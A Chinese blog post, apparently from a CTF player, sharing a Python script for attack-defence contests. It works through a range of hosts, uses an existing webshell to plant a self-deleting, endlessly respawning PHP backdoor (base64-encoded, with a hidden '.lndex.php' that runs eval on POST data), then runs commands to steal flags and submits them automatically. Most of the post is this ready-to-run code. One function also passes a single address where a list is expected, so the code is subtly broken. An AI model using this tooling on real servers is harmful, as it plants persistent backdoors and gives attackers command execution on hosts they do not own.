前几天祥云杯决赛,看到学弟们要跑好几个脚本,还得手动提交flag,浪费大量时间,以至于没有足够的时间来挖掘漏洞。所以搞了个脚本来简化一下操作。

注:本脚本是利用预留后门只起到辅助作用,不要过分依赖。掌握技术,挖掘漏洞才是最重要的。

0x00 脚本功能

  • 利用预留后门批量上传不死马
  • 自动激活不死马
  • 根据设置的每轮比赛时间,自动获取flag并自动提交

0x01 脚本使用

在物理机上用python3跑就行

注:自动提交flag需在脚本里设置对应的post参数,不同比赛提交方式不一样,大家自行修改。

0x02 脚本代码

# -*- coding: utf-8 -*-
# SmoothAttack V1.0
# Author: 7i4n2h3n9
# Team: Polar Day Cyberspace Security LAB

import time
import requests
import webbrowser

# Starting Option
def welmemu():
    """Interactively collect the run parameters.

    Prompts, in order, for the round length (minutes), the address range,
    the path of the existing shell, the HTTP port, the shell's POST
    parameter name and the submission token. Everything is returned as the
    raw input strings in that same order; nothing is parsed or validated here.
    """
    prompts = (
        'Please input the round time(min):',
        'Please input the ip segment(eg:192.169.10.2-192.169.10.40):',
        'Please input the shell dir(eg:/upload/1.php):',
        'Please input the port of http server:',
        'Please input the password of webshell:',
        'Please input the token:',
    )
    answers = [input(text) for text in prompts]
    return tuple(answers)

def dir_re(shell_dir):
    """Derive the drop path from the path of the existing shell.

    Takes whatever follows the last '/' in `shell_dir` and substitutes
    'jjnb.php' for it. The substitution is a plain str.replace, so it applies
    to every occurrence of that basename inside the path, not only the last.

    Args:
        shell_dir: path of the existing shell, e.g. '/upload/1.php'.

    Returns:
        the path with the basename swapped for 'jjnb.php'.
    """
    basename = shell_dir.rpartition('/')[2]
    return shell_dir.replace(basename, 'jjnb.php')

#Ip Analysis
def ipAnalysis(ipl):
    """Expand 'A.B.C.x-A.B.C.y' into the list of addresses A.B.C.x .. A.B.C.y.

    Only the last octet is iterated: the first three octets are copied from
    the left-hand address and the right-hand address contributes nothing but
    its last octet. Both endpoints are inclusive; an empty list results when
    the right-hand octet is smaller than the left-hand one.

    Args:
        ipl: range text in the form 'first-last', e.g. '192.169.10.2-192.169.10.40'.

    Returns:
        list of dotted-quad strings.
    """
    endpoints = ipl.split('-')
    low = endpoints[0].split('.')
    high = endpoints[1].split('.')
    prefix = '.'.join(low[:3])
    first, last = int(low[3]), int(high[3])
    return [prefix + '.' + str(n) for n in range(first, last + 1)]

# Upload BuSi Webshell
def upWebshell(ip, port, passwd, shell, bs_dir):
    """Drop the second-stage file on every host in `ip` and report where it took hold.

    Args:
        ip: list of host addresses, e.g. the output of ipAnalysis().
        port: HTTP port as a string; conWebshell() concatenates it into the URL.
        passwd: name of the POST parameter the existing shell at `shell` evaluates.
        shell: path of the existing shell on the host, e.g. '/upload/1.php'.
        bs_dir: path of the dropped file, e.g. dir_re(shell).

    Returns:
        list of the addresses whose follow-up check found the hidden file.

    Defender's view of the artifacts (all taken from the base64 blob below once
    decoded): the dropped 'jjnb.php' removes itself (unlink(__FILE__)), then keeps
    one PHP worker in an endless loop (set_time_limit(0), ignore_user_abort(1),
    while(1) with sleep(0)) that continually rewrites a hidden '.lndex.php' gated
    by a hard-coded md5 of a GET parameter. A long-running, busy PHP process plus
    a dot-file in the web root are the observable indicators; the rewrite loop is
    what the "undying" persistence depends on, so the process is what to stop.
    """
    suc_ipl = []
    # The md5 pass of busiwebshell is polarnight, post pass is jjnb
    # First stage: writes the base64-decoded dropper next to the existing shell.
    pay = "file_put_contents('./jjnb.php',base64_decode('PD9waHAgIA0KICAgIHNldF90aW1lX2xpbWl0KDApOyAgDQogICAgaWdub3JlX3VzZXJfYWJvcnQoMSk7ICANCiAgICB1bmxpbmsoX19GSUxFX18pOyAgDQogICAgd2hpbGUoMSl7ICANCiAgICAgICAgZmlsZV9wdXRfY29udGVudHMoJy5sbmRleC5waHAnLCc8P3BocCBpZihtZDUoJF9HRVRbInBhc3MiXSk9PSJiMGQyOWQ4NTIyZWNiNGU2YTE1YTFiMGMwNmJjZDNkOSIpe0BldmFsKCRfUE9TVFtqam5iXSk7fSA/PicpOyAgDQogICAgICAgIHNsZWVwKDApOyAgDQogICAgfQ0KPz4'));"
    # Second stage: asks the shell whether the hidden file the dropper creates exists.
    pay1 = "system('find /var/www/html -name .lndex.php');"

    for j in ip:
        url = 'http://' + j
        # The response of the first stage is not inspected; success is judged
        # solely by the 'find' result below.
        r = conWebshell(url, shell, passwd, port, pay)
        bsd = url + bs_dir
        try:
            # Opens the dropped file's URL in the local default browser
            # (presumably so the server executes it once), then waits a second.
            webbrowser.open(bsd)
            time.sleep(1)
        except:
            # NOTE(review): bare except silently hides any failure to open the browser.
            pass
        r1 = conWebshell(url, shell, passwd, port, pay1)
        if 'lndex' in r1.text:
            suc_ipl.append(j)
    return suc_ipl

# Connecting Webshell
def conWebshell(url, shell, passwd, port, pay):
    """POST `pay` to the shell at `url:port + shell` under the form field `passwd`.

    Args:
        url: scheme and host, e.g. 'http://192.169.10.2'.
        shell: path of the shell on the host.
        passwd: form field name; the prompt in welmemu() calls it the shell's password.
        port: port as a string (it is concatenated, not formatted).
        pay: PHP source sent as the field value.

    Returns:
        the requests.Response; callers read `.text`.
    """
    payload = {
        passwd:pay
    }
    url1 = url + ':' + port + shell
    # Form-encoded POST (dict passed positionally as `data`).
    response = requests.post(url1, payload)
    return response

def get_flag(ip, port, shell, passwd):
    """Run `getflag` through the shell on each element of `ip` and collect the raw responses.

    Args:
        ip: iterable of host addresses; one request is issued per element.
        port: HTTP port as a string, forwarded to conWebshell().
        shell: shell path, forwarded to conWebshell().
        passwd: form field name, forwarded to conWebshell().

    Returns:
        list of response bodies (str), one per element of `ip`, in order.
    """
    flag = []
    # Relies on a 'getflag' command being present on the host.
    g_flag_pay = "system('getflag');"

    for p in ip:
        url = 'http://' + p
        r = conWebshell(url, shell, passwd, port, g_flag_pay)
        flag.append(r.text)
    return flag

def sub_flag(r_time, ip, port, shell, passwd, token):
    """Endlessly fetch flags from every host in `ip` and POST them to the submission endpoint.

    Args:
        r_time: round length in minutes; the pause between passes is `r_time * 60`.
        ip: list of host addresses that upWebshell() reported as successful.
        port: HTTP port as a string, forwarded to get_flag().
        shell: shell path, forwarded to get_flag().
        passwd: form field name, forwarded to get_flag().
        token: team token sent alongside each flag.

    Never returns; the loop runs until the process is interrupted. The endpoint
    and the field names below are placeholders — the article says to adapt them
    to each event's submission API.
    """
    #Set submit flag url
    f_url = 'http://192.168.0.1'
    #Set token
    while True:
        for q in ip:
            flag_tmp = get_flag(q, port, shell, passwd)
            s_f_pay = {
                'flag':flag_tmp,
                'token':token
            }
            # Submission response is only echoed, never checked.
            r = requests.post(f_url,s_f_pay)
            print(r.text)
        time.sleep(r_time * 60)

if __name__ == '__main__' :
    # Everything comes back from welmemu() as raw input strings.
    round_time, ip_list, shell_dir, http_port, shell_pass, token = welmemu()

    # Drop path sits next to the existing shell; 'jjnb' is the POST field the
    # dropped file evaluates (see the comment above `pay` in upWebshell()).
    busi_dir = dir_re(shell_dir)
    busi_passwd = 'jjnb'
    print(busi_dir)

    ip_seg = ipAnalysis(ip_list)
    #print(ip_seg)

    # Only hosts where the second stage was confirmed are polled for flags.
    succe_iplist = upWebshell(ip_seg, http_port, shell_pass, shell_dir, busi_dir)
    print(succe_iplist)

    # Runs until interrupted.
    sub_flag(round_time, succe_iplist, http_port, busi_dir, busi_passwd, token)